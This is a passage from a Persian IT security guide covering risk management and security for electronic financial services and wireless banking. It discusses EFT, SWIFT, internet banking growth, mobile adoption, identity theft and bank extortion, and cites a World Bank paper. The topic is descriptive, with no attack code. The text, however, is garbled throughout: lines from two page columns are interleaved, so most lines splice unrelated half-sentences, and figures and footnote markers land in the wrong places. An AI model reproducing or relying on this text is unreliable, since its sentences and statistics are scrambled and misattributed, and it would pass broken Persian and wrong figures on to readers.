ﺑﻪ ﺍﺭﺍﺋﻪ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﻩ ﺩﺭ ﺍﺭﺍﺋـﻪ ﺧـﺪﻣﺎﺕ ﺻﻨﺎﻳﻊ ﻭ ﺑﺨﺸﻬﺎﻱ ﺟﺪﻳﺪ
ﭘﺮﺩﺍﺧﺖ ﻣﻲﭘﺮﺩﺍﺯﺩ؛ ﻭ ﻗﺴﻤﺖ "ﺯ" ﻧﻴﺰ ﻳﻚ ﺟﻤﻊﺑﻨـﺪﻱ ﻧﻬـﺎﻳﻲ ﻭ
ﺭﺷﺪ ﺳﺮﻳﻊ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺎﺯﺍﺭﻫـﺎﻱ
ﺩﻭﺭﻧﻤﺎﻳﻲ ﺍﺯ ﺁﻳﻨﺪﻩ )ﻧﺴﻞ ﺳﻮﻡ؛ (3Gﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ.
ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ ،ﺗﻮﺟـﻪ ﺩﻗﻴـﻖ ﺑـﻪ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴـﺖ
ﻫﺪﻑ ﺍﻳﻦ ﻓـﺼﻞ ﺍﺭﺍﺋـﻪ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ ﺭﺍﻫﻜﺎﺭﻫـﺎﻱ ﻣـﺪﻳﺮﻳﺖ
ﻣﺨﺎﻃﺮﺍﺕ ﻭ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﺑﺎﻧﻜﻬﺎ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧـﺖ
۱۳۲ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ ﻣﻘﺎﻟﺔ ﺑﺎﻧﻚ ﺟﻬـﺎﻧﻲ ﺑـﻪ ﻗﻠـﻢ Tom Kellerman
ﺍﺳــﺖ .ﺍﻳــﻦ ﻓــﺼﻞ ﺗــﻼﺵ ﻣــﻲﻛﻨــﺪ ﺑــﺴﺘﺮﻱ ﺑــﺮﺍﻱ ﺍﺭﺯﻳــﺎﺑﻲ ﺗﺤﺖ ﻋﻨﻮﺍﻥ:
"Mobile Risk Management: e-Finance for the
Wireless Environment (2002)":
133 Wireless Local Area Networks http://wbln0018.worldbank.org/html/FinancialS
134 Global System for Moblile Communication ectorWeb.nsf/SearchGeneral?openform&E-
Networks Security/E-Finance&Publications
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ١٨٦
ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﭼﻬﺎﺭ ﻗﺴﻤﺖ ﺍﺻﻠﻲ ﺗﺸﻜﻴﻞ ﺷـﺪﻩ: ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺍﺭﺍﺋﻪ ﻛﻨﺪ ﻛﻪ ﺩﺭ ﻣﺤﻴﻂ ﺑﻲﺳﻴﻢ ﻗﺎﺑﻞ ﻛـﺎﺭﺑﺮﺩ
ﺍﻧﺘﻘــﺎﻝ ﺳــﺮﻣﺎﻳﻪﻫــﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ) ،١٣٧(EFTﺗﺒــﺎﺩﻝ ﺩﺍﺩﺓ ﺑﺎﺷﺪ.
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ) ،١٣٨(EDIﺍﻧﺘﻘـﺎﻝ ﺳـﻮﺩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ) ١٣٩(EBTﻭ
١٣٥
ﺗﺄﻳﻴـــﺪ ﺗﺠـــﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـــﻲ ) EFT .١٤٠(ETCﺩﺭ ﻭﺍﻗـــﻊ ﺍﻟﻒ .ﻛﻠﻴﺎﺕ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﻗﺪﻳﻤﻲﺗﺮﻳﻦ ﺻﻮﺭﺕ ﺗﺒﺎﺩﻝ ﭘﻮﻝ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺍﻭﺍﻳـﻞ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﭼـﻪ ﺑـﺼﻮﺭﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﻭ ﭼـﻪ ﺑـﺎ
ﺩﻫﺔ ۱۹۶۰ﻣﺮﺳﻮﻡ ﺷﺪ .ﺩﺭ ﻣﻘﻴﺎﺱ ﺟﻬﺎﻧﻲ ﻣﻘﺪﺍﺭ ﺑﺴﻴﺎﺭ ﺯﻳـﺎﺩﻱ ﻣﻜﺎﻧﻴﺰﻣﻬــﺎﻱ ﺭﺍﻩ ﺩﻭﺭ ،ﺭﺷــﺪ ﺳــﺮﻳﻌﻲ ﺩﺍﺷــﺘﻪﺍﻧــﺪ .ﻛــﺸﻮﺭﻫﺎ ﻭ
EFTﺩﺭ ﺩﺍﺧﻞ ﻭ ﻣﻴﺎﻥ ﺑﺎﻧﻜﻬﺎ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺧﺰﺍﻧـﺔ ﺍﻳـﺎﻻﺕ ﻣﺼﺮﻑﻛﻨﻨﺪﮔﺎﻥ ﺑﺎ ﺭﻭﻧﺪ ﻓﺰﺍﻳﻨﺪﻩﺍﻱ ﺑﻪ ﻫﻢ ﻣﺘﺼﻞ ﻣﻲﺷﻮﻧﺪ .ﺍﻳﻦ
ﻣﺘﺤــﺪﻩ ﻣﻴــﺰﺍﻥ ﺁﻧــﺮﺍ ﺣــﺪﻭﺩ ۲ﺗﺮﻳﻠﻴــﻮﻥ ﺩﻻﺭ ﺩﺭ ﺭﻭﺯ ﻳــﺎ ۷۰۰ ﻓﻨﺎﻭﺭﻳﻬــﺎ ﻧــﻪ ﺗﻨﻬــﺎ ﻛــﺸﻮﺭﻫﺎﻱ ﻋــﻀﻮ ﺩﺭ ﺷــﺒﻜﻪ ﺭﺍ ﮔــﺴﺘﺮﺵ
ﺗﺮﻳﻠﻴﻮﻥ ﺩﻻﺭ ﺩﺭ ﺳﺎﻝ ﺗﺨﻤـﻴﻦ ﺯﺩﻩ ﺍﺳـﺖ .ﺑﺨـﺶ ﻋﻤـﺪﻩﺍﻱ ﺍﺯ ﻣﻲﺩﻫﻨﺪ ،ﺑﻠﻜﻪ ﺭﺍﻫﻬﺎﻱ ﺟﺪﻳﺪﻱ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺑﻮﺟﻮﺩ
ﻲ ﺷــﺒﻜﺔ SWIFTﺑﻮﺳــﻴﻠﺔ ﺧﻄــﻮﻁ ﺑــﻴﻦﺍﻟﻤﻠﻠــﻲ EFTﺑــﺎﻧﻜ ﹺ ﻣﻲﺁﻭﺭﻧﺪ .ﺍﺯ ﺍﻭﺍﺳﻂ ﺩﻫﺔ ۹۰ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻳﻬﺎﻱ ﺻﻨﻌﺖ ﺑﺎﻧﻜﺪﺍﺭﻱ
ﻣﺎﻫﻮﺍﺭﻩ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ .ﺩﺭﺣﺎﻝ ﺣﺎﺿـﺮ ﺣـﺪﻭﺩﹰﺍ ﻧﻴﻤـﻲ ﺍﺯ ۲۰۰ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺭﺿﺎﻳﺘﻤﻨﺪﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺭﻭﻱ ﺑﺎﻧﻜـﺪﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ
ﻛﺸﻮﺭ ﺩﻧﻴﺎ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺷﺒﻜﻪﻫﺎﻱ ﺩﺍﺧﻠﻲ ﺑﺰﺭﮒ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺗﻤﺮﻛﺰ ﻛﺮﺩﻩﺍﻧﺪ .ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻣﻨﺠـﺮ ﺑـﻪ ﻛـﺎﻫﺶ
ﺧﻄﻮﻁ ﻣﺎﻫﻮﺍﺭﻩﺍﻱ ﺗﺄﻣﻴﻦ ﻣﻲﻛﻨﻨﺪ .ﺍﮔﺮﭼﻪ ﻏﺎﻟﺐ ﺍﻳﻦ ﻛﺸﻮﺭﻫﺎ ﺍﺯ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺷﺪﻩ ﺍﺳﺖ .ﺷﺒﻜﺔ ﺍﻳﻨﺘﺮﻧﺖ ﻋـﻼﻭﻩ ﺑـﺮ
ﻟﺤﺎﻅ ﺍﻗﺘﺼﺎﺩﻱ ﺗﻮﺳﻌﻪ ﻳﺎﻓﺘﻪ ﻫـﺴﺘﻨﺪ ،ﺍﻣـﺎ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﺑﺎﻋـﺚ ﺻﺮﻓﻪﺟﻮﻳﻲ ﺩﺭ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺛﺎﺑـﺖ ﺗﻮﺳـﻌﻪ ﻭ ﻧﮕﻬـﺪﺍﺭﻱ ﺷـﻌﺐ،
ﺗﺮﺍﻓﻴﻚ ﺯﻳﺎﺩ ﻭ ﺣﺠﻢ ﻭﺳﻴﻊ ﻋﻤﻠﻴﺎﺕ ﺍﻗﺘﺼﺎﺩﻱ ﻣﻲ ﺷﻮﺩ؛ ﻭ ﺍﻳـﻦ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺮﺍﺣﻞ ﺍﺿـﺎﻓﻪ ﺭﺍ ﻧﻴـﺰ ﺣـﺬﻑ ﻛـﺮﺩﻩ ﻭ ﻫﺰﻳﻨـﻪﻫـﺎ ﺭﺍ
ﻣﺴﺌﻠﻪ ﺍﺯ ﻧﻘﻄﻪﻧﻈﺮ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﺩﻏﺪﻏﺔ ﺑـﺰﺭﮒ ﻛﺎﻫﺶ ﺩﺍﺩﻩ ﺍﺳﺖ .ﺍﻧﺠﺎﻡ ﻳﻚ ﺗﺮﺍﻛﻨﺶ ﻋـﺎﺩﻱ ﺍﺯ ﻃﺮﻳـﻖ ﻳـﻚ
ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻳﺪ ١٤١.ﺗﺎ ﺳﺎﻝ ۲۰۰۵ﺳﻬﻢ ﺑﺎﻧﻜـﺪﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺷﻌﺒﻪ ﻳﺎ ﺗﻤﺎﺱ ﺗﻠﻔﻨﻲ ﻫﺰﻳﻨﻪﺍﻱ ﻣﻌﺎﺩﻝ ﻳـﻚ ﺩﻻﺭ ﺁﻣﺮﻳﻜـﺎ ﺩﺍﺭﺩ،
ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺻﻨﻌﺘﻲ ﺍﺯ %۸،۵ﺑﻪ %۵۰ﻭ ﺩﺭ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺩﺭﺣﺎﻟﻴﻜﻪ ﺍﻧﺠﺎﻡ ﻫﻤﺎﻥ ﺗـﺮﺍﻛﻨﺶ ﺑـﺼﻮﺭﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﻫﺰﻳﻨـﻪﺍﻱ
ﺭﺷﺪ ﺍﺯ %۱ﺑﻪ %۱۰ﺧﻮﺍﻫﺪ ﺭﺳـﻴﺪ .ﺩﺭﺻـﻮﺭﺕ ﺑﺮﻗـﺮﺍﺭﻱ ﺑﻬﺘـﺮ ﻣﻌﺎﺩﻝ ۰،۰۲ﺩﻻﺭ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ .ﻫﺰﻳﻨﻪﻫﺎﻱ ﻧﺎﺯﻝ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ
ﺍﺗﺼﺎﻻﺕ ﺩﺭ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺗﺮﺍﻛﻨـﺸﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﺎﻋﺚ ﺭﻭﺍﺝ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺷﺪﻩ ﺍﺳﺖ .ﺧـﺪﻣﺎﺕ ﻣﺒﺘﻨـﻲ
ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺭ ﺳﺎﻝ ۲۰۰۵ﺗﺎ %۲۰ﺍﻓـﺰﺍﻳﺶ ﻳﺎﺑﻨـﺪ؛ ﻛـﻪ ﺑﺮ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﮔـﺎﻫﻲ ﺍﻭﻗـﺎﺕ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ
ﺭﻗﻤـــﻲ ﺑـــﻴﺶ ﺍﺯ ﺷـــﺶ ﺗﺮﻳﻠﻴـــﻮﻥ ﺩﻻﺭ ﻣﻌﺎﻣﻠـــﺔ ﺍﻳﻨﺘﺮﻧﺘـــﻲ ﺧﺪﻣﺎﺕ ﺻﻨﻌﺘﻲ ﺭﺍﻳﺞ ﻫﺴﺘﻨﺪ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺭ
١٤٣
ﺗﺠﺎﺭﺕ-ﺑﻪ-ﺗﺠﺎﺭﺕ ) ١٤٢(B2Bﺧﻮﺍﻫﺪ ﺑﻮﺩ. ﺑﺮﺯﻳﻞ ﻫﻤﭽﻮﻥ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﮔﺴﺘﺮﺵ ﻳﺎﻓﺘﻪ ﺍﺳﺖ .ﺑـﻪ ﻋﻠـﺖ
ﺩﺭ ﭘﻲ ﺭﺷﺪ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﻚ ﻧﮕـﺮﺵ ﺩﻳﮕـﺮ ﻧﻴـﺰ ﻋﺪﻡ ﻭﺟﻮﺩ ﺯﻳﺮﺳـﺎﺧﺖ ﻣﻨﺎﺳـﺐ ﺧﻄـﻮﻁ ﺩﺭ ﻏﺎﻟـﺐ ﻛـﺸﻮﺭﻫﺎﻱ
ﺩﺭﺣﺎﻝ ﺷﻜﻞﮔﻴﺮﻱ ﺍﺳﺖ :ﮔﺴﺘﺮﺵ ﺭﻭﺯﺍﻓﺰﻭﻥ ﻛﺎﺭﺑﺮﺩ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﻪ ،ﺑﻴـﺸﺘﺮ ﻣﺆﺳـﺴﺎﺕ ﻣـﺎﻟﻲ ﺧـﺪﻣﺎﺕ ﺧـﻮﺩ ﺭﺍ ﺩﺭ
ﺑﻲﺳﻴﻢ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻭ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ .ﺍﻳﻦ ﺭﺳـﺎﻧﺔ ﺑﺴﺘﺮﻫﺎﻱ ﺑﻲﺳﻴﻢ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﺮﺩﻩﺍﻧﺪ ﺗﺎ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ ﺁﻧﻬـﺎ ﺭﺍ
ﻧﺴﺒﺘﹰﺎ ﺟﺪﻳﺪ ﺑﺴﺮﻋﺖ ﺩﺭﺣـﺎﻝ ﺗﺒـﺪﻳﻞ ﺷـﺪﻥ ﺑـﻪ ﺭﺳـﺎﻧﺔ ﺍﺻـﻠﻲ ﮔﺴﺘﺮﺵ ﺩﺍﺩﻩ ﺑﺎﺷﻨﺪ .ﻫﻤﺰﻣﺎﻥ ﺑﺎ ﺍﻳﻦ ﻭﺍﻗﻌﻴﺘﻬـﺎ ،ﭼﻬـﺎﺭ ﮔـﺮﺍﻳﺶ
ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻚ ﻭ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳـﺖ .ﺗﺤـﻮﻝ ﻣــﺮﺗﺒﻂ ﺑــﺎ ﻓﻨــﺎﻭﺭﻱ ﺟﺪﻳــﺪ ﺩﺭ ﺻــﻨﻌﺖ ﺍﻳﺠــﺎﺩ ﺷــﺪﻩ ﺍﺳــﺖ:
ﻛﺴﺐ ﻭ ﻛﺎﺭﻫﺎ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﺎﻏﺬﻱ ﺑﻪ ﺑﺴﺘﺮﻫﺎﻱ ﻣﺒﺘﻨـﻲ ﺑـﺮ ﺑﺮﻭﻧﺴﭙﺎﺭﻱ ،ﻣﻌﻤﺎﺭﻱ ﺑﺎﺯ ،ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻳﻜﭙﺎﺭﭼـﻪ ،ﻭ ﺭﻭﺷـﻬﺎﻱ
١٣٦
ﺍﻳﻨﺘﺮﻧﺖ ﺑﺴﻴﺎﺭ ﻋﻤﻴﻖ ﺑﻮﺩﻩ ﺍﺳـﺖ .ﻫﻤﻴﻨﻄـﻮﺭ ﻛـﻪ ﺑـﺴﺘﺮ ﺍﻧـﻮﺍﻉ ﺟﺪﻳﺪ ﭘﺮﺩﺍﺧﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ.
ﺧﺪﻣﺎﺕ ﺍﺯ ﺧﻄﻮﻁ ﺯﻣﻴﻨﻲ ﺑـﻪ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ ﺑـﻲﺳـﻴﻢ ﺑـﺎ ﺍﻣﻜـﺎﻥ
ﺳﺮﻗﺖ ﻫﻮﻳﺖ ،ﺗﺒﺎﺩﻝ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺟﻌﻠـﻲ ،ﻭ ﻫﻤﭽﻨـﻴﻦ ﺍﺧـﺎﺫﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻴﺸﺘﺮ ﺗﺒﺪﻳﻞ ﻣﻲﺷﻮﺩ ،ﺍﺛﺮﺍﺕ ﻣﻨﻔـﻲ ﺍﻳـﻦ ﭘﺪﻳـﺪﻩ ﻧﻴـﺰ
ﻓﺮﺍﻫﻢ ﻛﺮﺩﻩ ﺍﺳﺖ. ﮔﺴﺘﺮﺵ ﻣﻲﻳﺎﺑﺪ.
ﺩﺳ ـﺘﮕﺎﻫﻬﺎﻱ ﺳــﻴﺎﺭ ﺍﻣــﺮﻭﺯﻩ ﺑﻌﻨــﻮﺍﻥ ﻟﺒــﺔ ﺩﺭﺣــﺎﻝ ﭘﻴــﺸﺮﻓﺖ
ﺏ .ﻣﺨﺎﻃﺮﺍﺕ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﻬﺎﻥ ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﻧﺪ .ﺩﺭ ﺳﺎﻝ ۱۹۹۰ﺗﻨﻬﺎ ﻳﺎﺯﺩﻩ
ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻣﻴﻠﻴﻮﻥ ﻣﺸﺘﺮﻙ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﺩﺭ ﺗﻤﺎﻡ ﺩﻧﻴﺎ ﻭﺟﻮﺩ ﺩﺍﺷـﺖ ١٤٤.ﺗـﺎ
ﺩﺭ ﻛﻨﺎﺭ ﻓﻮﺍﻳﺪ ﺯﻳﺎﺩ ﻓﻨﺎﻭﺭﻱ ﺟﺪﻳﺪ ،ﻣﺨﺎﻃﺮﺍﺗﻲ ﻫﻢ ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻩ ﺳﺎﻝ ۱۹۹۹ﻭ ﺑﺎ ﮔﺴﺘﺮﺵ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ ﺑـﻲﺳـﻴﻢ ﺍﻳـﻦ ﺭﻗـﻢ ﺑـﻪ
ﺍﺳﺖ ،ﭼﺮﺍﻛﻪ ﻓﻨﺎﻭﺭﻱ ﺭﻭﺷﻬﺎﻱ ﺟﺪﻳﺪ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﻭ ﺳـﺮﻗﺖ ﺭﺍ ﭼﻴﺰﻱ ﻓﺮﺍﺗﺮ ﺍﺯ ﭘﺎﻧﺼﺪ ﻣﻴﻠﻴﻮﻥ ﺭﺳﻴﺪ ﻭ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻧﻴﺰ ﺗﻘﺮﻳﺒـﹰﺎ
ﻧﻴﺰ ﺗـﺴﻬﻴﻞ ﻣـﻲﻛﻨـﺪ .ﺍﻛﻨـﻮﻥ ﻣـﺴﺎﺋﻠﻲ ﭼـﻮﻥ ﺟﻌـﻞ ﻫﻮﻳـﺖ، ﺩﻭ ﺑﺮﺍﺑﺮ ﺁﻥ ﻣﻘﺪﺍﺭ ﺷﺪﻩ ﺍﺳﺖ .ﺑﺮﺭﺳﻲ ﺁﻣﺎﺭ ﻣﺸﺎﺑﻪ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ
ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ،ﻭ ﭼﺎﭖ ﺗـﺼﺎﻭﻳﺮ ﺍﻭﺭﺍﻕ ﺑﻬـﺎﺩﺍﺭ ﺑـﺎ ﻛﻴﻔﻴـﺖ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ،ﺟﻬﺸﻲ ﻛﻪ ﺩﺭ ﺍﺛﺮ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺳـﻴﺎﺭ
ﻋــﺎﻟﻲ ﺩﺭ ﺩﻧﻴــﺎﻱ ﺍﻳﻨﺘﺮﻧﺘــﻲ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ ﻭ ﺍﺑﺰﺍﺭﻫــﺎ ﻭ ﺑــﺴﺘﺮﻫﺎﻱ ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻩ ﺭﺍ ﺑﺨـﻮﺑﻲ ﻧـﺸﺎﻥ ﻣـﻲﺩﻫـﺪ ١٤٥.ﻛـﺸﻮﺭ ﻛــﺎﻣﺒﻮﺝ
ﭼﻨــﺪﻣﻨﻈﻮﺭﻩ ﺍﻧﺠــﺎﻡ ﺁﻧﻬــﺎ ﺭﺍ ﺗــﺴﻬﻴﻞ ﻣــﻲﻛﻨﻨــﺪ .ﺑــﺎ ﮔــﺴﺘﺮﺵ ﺩﺭﺣﺎﻟﻴﻜﻪ ﭘﺲ ﺍﺯ ﺣﺪﻭﺩ ۲۰ﺳﺎﻝ ﺟﻨﮓ ﺷـﻬﺮﻱ ﺷـﺒﻜﺔ ﺧﻄـﻲ
ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧﻮﺩﭘﺮﺩﺍﺯ ﺗﻠﻔﻨﻲ ١٤٦ﻛﻪ ﺩﺭ ﻣﻨﺎﻃﻖ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺛﺎﺑﺖ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻩ ﺑﻮﺩ ،ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ
ﺍﻣﻜﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﻮﻝ ﺭﺍ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ ،ﺑﺰﻫﻜﺎﺭﺍﻥ ﻗﺎﺩﺭﻧﺪ ﻛـﻪ ﺗﻮﺍﻧﺴﺖ ﺑﺎﺭ ﺩﻳﮕـﺮ ﺍﺗـﺼﺎﻻﺕ ﺧـﻮﺩ ﺭﺍ ﺑﺮﻗـﺮﺍﺭ ﻛﻨـﺪ .ﺩﺭ ﺧـﻼﻝ
ﻳﻜﺴﺎﻝ ﺑﻌﺪ ﺍﺯ ﺁﻏﺎﺯ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ،ﺗﻌﺪﺍﺩ ﻣﺸﺘﺮﻛﺎﻥ
ﺑﺨﺶ ﺳﻮﻡ
ﻧﮕﺮﺍﻧﻲ ﺍﺯ ﻟﻜﻪﺩﺍﺭ ﺷﺪﻥ ﻭﺟﻬﺔ ﻋﻤﻮﻣﻲ ﺧﻮﺩ ،ﺍﺯ ﮔﺰﺍﺭﺵ ﺁﺳـﻴﺒﻬﺎ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ،ﻧﻔﻮﺫ ﺑﻌﻨﻮﺍﻥ ﻣﺪﻟﻲ ﺑﺮﺍﻱ ﻛﺴﺐ ﻭ ﻛﺎﺭ ﻣﻄﺮﺡ ﺍﺳﺖ.
ﻭ ﺿﺮﺭﻫﺎﻱ ﻭﺍﺭﺩﻩ ﺑﻴﻤﻨﺎﻙ ﻫﺴﺘﻨﺪ؛ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻣﺎﻧﺪﻥ ﺑﺨﺶ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ FBIﺍﻋﻼﻡ ﻛﺮﺩﻩ ﻛـﻪ ﺍﻛﺜـﺮ ﺑﺎﻧﻜﻬـﺎ ﺑـﻪ
ﺭﺍ ﺗﺮﺟﻴﺢ ﻣﻲﺩﻫﻨﺪ .ﺍﮔﺮ ﻣﺸﺨﺺ ﺷﻮﺩ ﻛﻪ ﻳﻚ ﺑﻨﮕﺎﻩ ﺍﻗﺘـﺼﺎﺩﻱ ﻋﻠــﺖ ﺗــﺮﺱ ﺍﺯ ﺑــﻲﺁﺑﺮﻭﻳــﻲ ﻭ ﺍﺯ ﺩﺳــﺖ ﺩﺍﺩﻥ ﻣــﺸﺘﺮﻳﺎﻥ ،ﺑــﺎﺝ
ﻫﺪﻑ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ،ﻣﺸﺘﺮﻳﺎﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻲ ﭘﺮﺩﺍﺯﻧﺪ .ﺍﺧﺎﺫﻱ Eggheadﺩﺭ ﺳﺎﻝ ﮔﺬﺷـﺘﻪ ﻳـﻚ ﻧﻤﻮﻧـﺔ
ﺍﻋﺘﻤـﺎﺩ ﺧــﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳــﺖ ﺑﺪﻫﻨــﺪ ﻭ ﺍﺯ ﺁﻥ ﭘــﺲ ﻣﺎﻳــﻞ ﻧﺒﺎﺷــﻨﺪ ﻣﺸﻬﻮﺭ ﺍﺳﺖ ،ﻛـﻪ ﺩﺭ ﺁﻥ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩﺍﻱ ﺷـﺎﻣﻞ ﺩﻩ
ﺍﻃﻼﻋﺎﺗﺸﺎﻥ ﺩﺭ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺁﻥ ﺑﻨﮕـﺎﻩ ﺫﺧﻴـﺮﻩ ﺷـﻮﺩ .ﺿـﺮﻭﺭﻱ ﻫﺰﺍﺭ ﺷﻤﺎﺭﺓ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺭﺍ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗـﺮﺍﺭ ﺩﺍﺩﻧـﺪ ﻭ ﺑـﺮﺍﻱ
